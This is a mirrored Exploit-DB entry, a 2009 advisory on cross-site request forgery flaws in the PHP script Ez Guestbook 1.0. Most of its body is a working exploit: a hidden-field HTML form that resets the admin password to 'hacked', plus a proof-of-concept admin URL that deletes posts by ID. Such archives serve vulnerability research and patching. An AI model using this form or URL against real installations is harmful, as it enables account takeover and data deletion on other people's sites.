bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10420.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

49 lines
No EOL
2 KiB
Text
Raw Blame History

[-------------------------------------------------------------------------------------------------]
[ Title: Ez Guestbook 1.0 Multiple Vulnerabilities
]
[ Author: Milos Zivanovic
]
[ Email: milosz.security[at]gmail.com
]
[ Date: 14. December 2009.
]
[-------------------------------------------------------------------------------------------------]
[-------------------------------------------------------------------------------------------------]
[ Application: Ez Guestbook
]
[ Version: 1.0
]
[ Link: http://www.scriptsez.net/?action=details&cat=Guestbooks&id=11873094083
]
[ Price: 10 USD
]
[ Vulnerability: Cross Site Request Forgery
]
[-------------------------------------------------------------------------------------------------]
Ez Guestbook script version 1.0 suffers from multiple vulnerabilities:
[#]Content
|--Change admin password
|--Remove post by ID
[*]Change admin password
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/ez_gb/admin.php?action=change_password"
method="post">
<input type="hidden" name="admin_password" value="hacked">
<input type="hidden" name="c_admin_password" value="hacked">
<input type="hidden" name="add" value="true">
<input type="submit" name="submit" value=" CHANGE ">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
[+]Remove post by ID
[POC----------------------------------------------------------------------------------------------]
http://localhost/ez_gb/admin.php?action=view&do=delete&id=[ID]
[POC----------------------------------------------------------------------------------------------]
[----------------------------------------------EOF------------------------------------------------]
Reference in a new issue View git blame Copy permalink